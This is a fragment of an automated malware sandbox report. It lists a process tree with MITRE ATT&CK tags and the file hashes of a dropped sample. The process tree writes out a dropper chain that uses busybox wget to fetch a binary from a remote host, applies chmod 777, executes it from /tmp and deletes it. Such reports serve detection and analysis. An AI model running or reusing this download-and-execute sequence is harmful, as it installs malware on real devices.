- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1017
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:1019
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1020
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1021
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1022
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97